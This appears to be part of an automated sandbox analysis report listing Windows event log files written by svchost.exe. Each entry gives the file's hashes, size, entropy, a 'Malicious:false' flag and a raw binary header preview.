                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):2.4485744286205566
                                                                              Encrypted:false
                                                                              SSDEEP:384:GhFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjDfi:GzSKEqsMuy645tZtPN
                                                                              MD5:4572B4ADCED1EA2335588876D2A4AF20
                                                                              SHA1:0F16E0FF89200599B7DB688563F2E6B656ECFD4B
                                                                              SHA-256:68B18DB8939820C2E1E49267F4DA6D5F9EEBECF40A43BE0DEE1643D96CD5FE4C
                                                                              SHA-512:6D9E98838FEE3DB11033784CA8A912608F7814D2353C14C839BC372CE4EBF0AC9D05984EA3FE0B153062BAE55CB850277100569B37ED1B798CCDCA1E7746AD57
                                                                              Malicious:false
                                                                              Preview:ElfChnk.........L...............L....................:.N....................................................................j...................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................=....................................................................`..........**...............v?..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):2.1559400308203562
                                                                              Encrypted:false
                                                                              SSDEEP:384:BhMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3zZ:Bmw9g3Lf
                                                                              MD5:64B9990B5E7F3874310C63A28FF2269B
                                                                              SHA1:B1A4325EECAFB72D9AFF23F1759F866757699E9E
                                                                              SHA-256:3C9770DF816491A1C40167F1C53A46FB17122962B646A72F604ED3044A981DCC
                                                                              SHA-512:BC184A0543AC3022AC17527A5569CA2105E1A9B779B829A7B1FB3A72BD2B429797E1E09A229880E5803F38809A17D2FE019374D87EBC6658AB55DB837DF5C6A3
                                                                              Malicious:false
                                                                              Preview:ElfChnk.........6...............6...........(o...p...].O....................................................................|.3.................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......E.......................n.......#....................................................................X..........**..............j...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-WHEA%4Operational.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):1.887574143139413
                                                                              Encrypted:false
                                                                              SSDEEP:384:BhoIRbiY8sITkAI6RdkbI4IfIixIWMIPIxIJI7IyIUIgIoqIuILI:BOnDB
                                                                              MD5:59A9F7EF42800364F6BF938C549BBD94
                                                                              SHA1:43FAC818EB3960E73963CFD78F1AE4DE6A3799D6
                                                                              SHA-256:E2BD020B97A6FB59EF57126B4DC72C56E7F457A06C7F911243C77BC0C1ACC206
                                                                              SHA-512:2A62CCA656E0761FF2C1F585207C03B19E9E827C80293C9A402C01A353D47774BC97A7A48CD136862131F18434DD29245D3A1E20E88A72AF45824ECAB6B26153
                                                                              Malicious:false
                                                                              Preview:ElfChnk.K.......L.......K.......L...........x...86.....&......................................................................e.................&.......................N...=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................................................................&...........**..x...K.....................F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:MS Windows Vista Event Log, 2 chunks (no. 1 in use), next record no. 128, DIRTY
                                                                              Category:dropped
                                                                              Size (bytes):69080
                                                                              Entropy (8bit):4.509980090125105
                                                                              Encrypted:false
                                                                              SSDEEP:768:liaBJiaBCPIEQ8QtnkVKRNlY20sMY3Dp13/n/ydIxm6g/ZSi+uQ/NujMAEWD4gmd:rp1
                                                                              MD5:4B9585E14B400BA518CC335B3465E183
                                                                              SHA1:A6D863D32FFC91A6B026E1BF20E5493509CE4EE0
                                                                              SHA-256:6535D132FBEA1AAE14E3E8FC858CFA365EE06F0409EC89E6E316CF5E54CE7A93
                                                                              SHA-512:D1B5D3A3278A7B18C5EC75C8E9460D0FF293C2810643ED2AD2F6D946D1E374CF9854A28714BCBAAEEB004AC1F70CF09A7182893DF0E1432ABC4985CAECADEC01
                                                                              Malicious:false
                                                                              Preview:ElfFile.........................................................................................................................ElfChnk.~...............~...................`...X.............................................................................au................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................................................................&...........**..p...~........qV..........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-NCSI%4Operational.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):0.9969363418868648
                                                                              Encrypted:false
                                                                              SSDEEP:384:Oh1hM7MpMEaMWFMu/Ma2M+AMmGM1cMNF3Mg9Ml7MABMczM0cMKhMGmMqb+MvhMIp:OeJWU
                                                                              MD5:F3F76FCFEA8151604EA805CB80B1FF45
                                                                              SHA1:53062346A40583E0ED706493B387818CF85A608A
                                                                              SHA-256:46BE32A18F777427FCB76E515EDD8612F22823F8D5F9C75FAF64DFBC9D810BC0
                                                                              SHA-512:DF7829C3655FC7F7AF8C6F82DF8F48C3842AB6AC99B32705AC232DDD1D7398A93B3C03BA8217D055702FB8881AC8FC5DECCEAB8E2ED23F8B73C7B2737DFD00C2
                                                                              Malicious:false
                                                                              Preview:ElfChnk......................................+..0-...i........................................................................z4........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................&............................................................................................................%..........**..............c...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-NetworkProfile%4Operational.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.231994720329579
                                                                              Encrypted:false
                                                                              SSDEEP:384:ehk1EL1I1Vh1C1D161f1f181L1tY1VGm1Q1L1p1VG1U1Z1s1VA141c1Vc1q1tS16:eBjdjP0csCk+
                                                                              MD5:2418B580C396BF3D2B2E78EF78F65991
                                                                              SHA1:5AA4D8E6E8EC06232294A57762DCF70B6A4AEC46
                                                                              SHA-256:4FA9363ED99CF66AA2B887DB72C99F7E21B364AAFE0C169B5CEACEF72E971557
                                                                              SHA-512:650C05CE840801E047324A41E74F07718BC4503AD16860C4161B31027B2D480F0DD72B1EB936F08C3985DDAE151D7340D1C7DD09C61F957694A3A800F7923F4C
                                                                              Malicious:false
                                                                              Preview:ElfChnk.........................................p...$.._......................................................................5.................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................A.......................................................**..............*5.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4Operational.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):77968
                                                                              Entropy (8bit):3.346591659832869
                                                                              Encrypted:false
                                                                              SSDEEP:384:MxlIj3SIWILIlIRIYzIvI3IoXIYD4IKIIQIq9IWIYIFI7IkIzIMMIPIj/hDIEQAP:MG//ZxGuTcr8
                                                                              MD5:1E6E6D812DDBFE6554EE7D09E2613C23
                                                                              SHA1:339E1F75DC13CA9562037AFC19C265BD70110181
                                                                              SHA-256:D30D8665BC1F8918203F0B273C8277D9DF22684A3B67954B994EC5A6A9DACBC3
                                                                              SHA-512:C39903D12DC293DF21DB256BC8B4B99B63C2044B9B3C3C710460CE68518F43E1C7E4A19E70BBDC4BD2D7CA36AC38C9F0E9B8A6DC2B4AF59B129C8F20D6A3C293
                                                                              Malicious:false
                                                                              Preview:ElfChnk.T...............T...................x...h...U.].....................................................................:o.w........................................>...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................1........................................<...............(..........**......x.......bw..^........F...(..............................................................,.......D.....!........... ....@bw..^.....................P...x....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.N.t.f.s..z.?..nM.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.N.t.f.s./.O.p.e.r.a.t.i.o.n.a.l...........&.......6p.\.#i....>..........2........A..=...>.../....=.......V.o.l.u.m.e.C.o.r.r.e.l.a.t.i.o.n.I.d.......A..7...>...)....=.......V.o.l.u.m.e.N.a.m.e.L.e.n.g.t.h....

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4WHC.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):0.8010759015442367
                                                                              Encrypted:false
                                                                              SSDEEP:384:Zmh6iIvcImIvITIQIoIoI3IEIMIoIBIjIIQIYIRIEMIO4I:ZmoxDJ
                                                                              MD5:697F5D7E812BBBA5F48BAEEE79161558
                                                                              SHA1:2BB9620AEAFE781DAD1250C78AE760F530C04FEF
                                                                              SHA-256:1F9630EFD18553522D80986F123499E9172D5D8949BD43F82D0964ED671CE516
                                                                              SHA-512:166A91F00C96D4B5DB8C75B843FCD2ED191CAF2D82CEB41138FD22663D481CB50BF38D5C522524C94033EE7CD3C303AFA60261F95900299C73E2E0277834C598
                                                                              Malicious:false
                                                                              Preview:ElfChnk.....................................X"...#..!.._.....................................................................8.Y............................................=...........................................................................................................................f...............?...........................m...................M...F...........................&...........................................................................................................^...........**..............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Partition%4Diagnostic.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):2.9976457275581723
                                                                              Encrypted:false
                                                                              SSDEEP:768:j4u1n8zfFFU1x4Dk13xIb13xIb13xIt13xIi13xI513xIU13xI013xIF13xIH13N:p
                                                                              MD5:8B81799FB23EDB0DFBBE63CB0A6D0091
                                                                              SHA1:08F10769E5AC65A808F3229113875C18E68F02A2
                                                                              SHA-256:199F3107FA0F478BECC0D255CA70F74B63F048F6B43015C4BCEFC7DB07358609
                                                                              SHA-512:098626BC09ECABD19653ADFE82C5CC8A73C4CD1537C28E781484F6B676E837896C892B3E0691E5D469C1972A76B646456E14907280D1040181C1F973B9302E61
                                                                              Malicious:false
                                                                              Preview:ElfChnk.....................................(...8...&..........................................................................`................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................ ......................................................................................**...............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-PowerShell%4Operational.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):69752
                                                                              Entropy (8bit):3.87989584428036
                                                                              Encrypted:false
                                                                              SSDEEP:768:+fdutDMjV8k+u7eUtHpoVWk6HrWbGyYKQc90XU07SZRcZv76NcRUjGHzLKvc90X:8utDMjV8k+u7PtHpoVW
                                                                              MD5:1F58EC628BA97CF1A7EF30ED1B5D1C77
                                                                              SHA1:3D55DF2B14BE2A77AE8B71EE1154228A615ECACC
                                                                              SHA-256:8C12F1B929E28A65D2249E1EA94C17C74273817543516E8E893B337BCD7ADFFD
                                                                              SHA-512:5512B0E5F09252874AF662BB94FBBFFB0476CD9967CAE525E2B54937C92FE40A0F17CFDC45FF844E2E0946ECC43F6BCB13B68EBDAB0CBD3514B5336A1863A890
                                                                              Malicious:false
                                                                              Preview:ElfChnk.................N.......S...............x....G......................................................................1F.................2...........................=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................................................................&...........**..`...N........}...^........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-PushNotification-Platform%4Operational.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.446389340861676
                                                                              Encrypted:false
                                                                              SSDEEP:768:Z73QQ6FAR3Jmuh9MmjoEawi5kzp7kaEDC1Nol7iL:x30AR9Mm+wim74JiL
                                                                              MD5:987FCEB3FED984E85C924A55CBE7901D
                                                                              SHA1:E7D302E40C5681D0E8B5CE38D1D58610570B66F9
                                                                              SHA-256:BF86420CFB4BE176EE74D4EE925801EEFE1317330EF24F05C4069E4E19992E0A
                                                                              SHA-512:1A8AF2EB3FB7D7437350D1039591704BCE31F42D6ADE104E5AB72FC6C1F6C5E068410E05CB864EEF0DBB3D98FB8D4B3841F84DD6512A278065B53861B3BDACB3
                                                                              Malicious:false
                                                                              Preview:ElfChnk.[...............[.......................8...aB1.....................................................................k..................p...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................OW........../h......./..7<..........................................................w...............o%..**..X...[.........e...........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-ReadyBoost%4Operational.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):0.7589270703948895
                                                                              Encrypted:false
                                                                              SSDEEP:384:fhP8o8Z85848V8M8g8D8R8E8y8eE8U8+8G8:fy
                                                                              MD5:DB0D7D192D45E88155DA386A4CFAA7BC
                                                                              SHA1:0CA51DB6F3145F47A7DEE55DD59804DDC20788FF
                                                                              SHA-256:4D675E0BB5F2F8FB820C9A7E60290AA18EB63DB48D85C343D67B7D1036CAF535
                                                                              SHA-512:77BF88FE30C9A2E76B610094998F26BB168BAC41DA2A70C4BCB9C7A7A67B2821C6E7F2D57535CBB47EBC07A89F69BA997028F30ED43D507CB0E9C268BDC74789
                                                                              Malicious:false
                                                                              Preview:ElfChnk.........................................8!....RE.....................................................................J>.........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...........................................................................v...........**..(.............................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):3.7681443373841628
                                                                              Encrypted:false
                                                                              SSDEEP:1536:2XhZUyS+z1VV18o838c8bUc8cVVsz8VX8SoX8aA8cmtpjAiVB18dwE4vjcYoMjn1:2XLnS
                                                                              MD5:ECD50547DA19F16A51FDA8A61B13972B
                                                                              SHA1:D13DE19172977CE5D0200DA8D97CF9EA228E4551
                                                                              SHA-256:CB25E241C8446B843D41F381632449B09EA92699F04E3900A8DE21BB8D745F29
                                                                              SHA-512:7307453F82D151781DC95CAB8631A215F4921EA68983AD07D7A82BD6D85F19226964C5686816D9B39926BFE5899BED2CB764FED200A9117273C9A4006EC64AB3
                                                                              Malicious:false
                                                                              Preview:ElfChnk.........(...............(............J..pL...(......................................................................8.#=................v...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................O............9..........**..............g5...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-SMBServer%4Operational.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):2.3821645601708283
                                                                              Encrypted:false
                                                                              SSDEEP:768:U0VsLY/Z5aFka2aKazzabCafama5Sa0ra6rzaJcavkao9O4aui1J6eJOQJMBJX:4cE
                                                                              MD5:CBF5E5B9F2994F33BE03BF0A826A629E
                                                                              SHA1:BFF85BF98CE5D092C06B3A7D366A077B5736E934
                                                                              SHA-256:B6B321D43FBF2CEE1D19A0EB4E3AA5134660D844E2DED9871E98A58DE11461E3
                                                                              SHA-512:7FFD68E0DE84CFD8CF091526E624209FF41644A2EBBEF4BED8584F11F4EC333BC5BA880257417930C6DAB318094D59479BB160949CAAC0FC985A3EE946071D73
                                                                              Malicious:false
                                                                              Preview:ElfChnk.........>...............>...........0v..`x....p.......................................................................+#................Q...........................=...........................................................a...............................................................f...............?...2...........................................M...F...........................*...........&....]..................................................................................]...................**.............._.............X..&.......X...],T.'tB..E........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2680
                                                                              Entropy (8bit):3.83226399830889
                                                                              Encrypted:false
                                                                              SSDEEP:48:McWtzCKOrCK3QuB69DifSrCKOrCK3QQkcqr8l+bCKOrCK3QQkcqr9:izCKOrCKgO69DCeCKOrCKgQkcG8GCKO+
                                                                              MD5:09ED2C1A198E4CA0195DE75D9326609D
                                                                              SHA1:FEEF26549A43B0004492890E9BDA463813F87A5C
                                                                              SHA-256:E033955F842AE6027C500E4EB9EBE7EAF12950B0E5A97FAE1CDBB94180BBEA44
                                                                              SHA-512:4A2A6A8FCD24F3C32BA61F65D25E729986CC7CF70CB65D9A79BB0D112AC588110679E14F8E213A61AD92F6CD9EE2E930F4B98F28F67250FB442D936B9B3DFB66
                                                                              Malicious:false
                                                                              Preview:ElfChnk.'.......0.......'.......0............>...A...!S......................................................................f..................X...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................1...........................................................................................&...........**...............w..^........F..&...............................................................L.......b.....!..................w..^.................0............................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.M.i.t.i.g.a.t.i.o.n.s........J...M..<.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.M.i.t.i.g.a.t.i.o.n.s./.K.e.r.n.e.l.M.o.d.e...!..^1...........h.......>...................................4.\.D.e.v.i.c.e.\.H.a.r.d.d.i.s.k.V.o.l.u.m.e.3.\.W.i

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-SettingSync%4Debug.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.315070457008112
                                                                              Encrypted:false
                                                                              SSDEEP:384:NYU/hDGCyCkCzCRCFCZC4MCyCcC7CgzCiCoCD24F2a2EO2M2w2s023C8CJCpCFIz:NYU/dEoNTC
                                                                              MD5:C7807651248E908ECCF27697EBB71AF0
                                                                              SHA1:4FE175151F778EF674F74D25145CCCF62C52F2C8
                                                                              SHA-256:A9D4FFC731E3D8287A25FFE350D5142FE1E9CD5D377F0BD7D29BB827C2F12658
                                                                              SHA-512:5A8FA490F7BFC98FD39635AA30A0E92AA3C9FFC279424C7D23E9F2893CF7B0FC91BF1F3DAFD14CA006B437AB6E18FAA67FBF7AF96E5347FE27042B262235214D
                                                                              Malicious:false
                                                                              Preview:ElfChnk.U...............U...........................$....................................................................O...................F.......................n...=...........................................................................................................................f...............?...........................m...................M...F............................4..............................&................................................................n...........N..........**..0...U.........Df..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4AppDefaults.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.482742417101403
                                                                              Encrypted:false
                                                                              SSDEEP:1536:bcPLvjwmE+ukWvw75NFyBo/QbG7YX1cchg52p5cfFSYl8ZAgRrfhXWmSY0NGQ6my:bcPLvjwmE+ukWvw75NFyBo/Qq7YX1cct
                                                                              MD5:B1F20410E64B0CD42CE4FCBF7AFC9018
                                                                              SHA1:4EE19EB81E1C99FDC1C7BA4E87F091AB124FE250
                                                                              SHA-256:7AE6BA887BEF8232508D1660717AA893FE68C75D3E4B2D48668AC1E4CD3C0461
                                                                              SHA-512:31EDD8B6257AE2C232572765C7ED08A4BA016499A3B0340D55AF1796AD633D17533C0288E07F9B5E74D19A5CF842A63468AE54F61A49F680722E95A48983DE01
                                                                              Malicious:false
                                                                              Preview:ElfChnk.....................................8i...j.............................................................................5................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&............................................................................I..........**..............XH^...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4Operational.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):70808
                                                                              Entropy (8bit):4.461826984214522
                                                                              Encrypted:false
                                                                              SSDEEP:1536:XZzSEmaSmDO+Xxp4HTQMhzEB1PBM+4MFGhLF/EBRyqXiUHeISNplZzSEmaSmDO+w:XZzSvaSmDO+Xxp4HTQMhzEB1PBM+4MFT
                                                                              MD5:0930F903A34CF17A3874B947CC9B4524
                                                                              SHA1:4F8EBF8CA5716E71F27F403E5D8173FACB60AC1F
                                                                              SHA-256:36142DD0D2291D977807E4CCC461FF0C7D4ABE97A7F5078DB3BDA6E914F5016D
                                                                              SHA-512:0F5940AB657B2E629AE882CF7962F632448781070787300FC6189B6409AA8A08102279EADBB1DA309619099EEA96252198A830F1C555A5016EFEB2B5FC17DA86
                                                                              Malicious:false
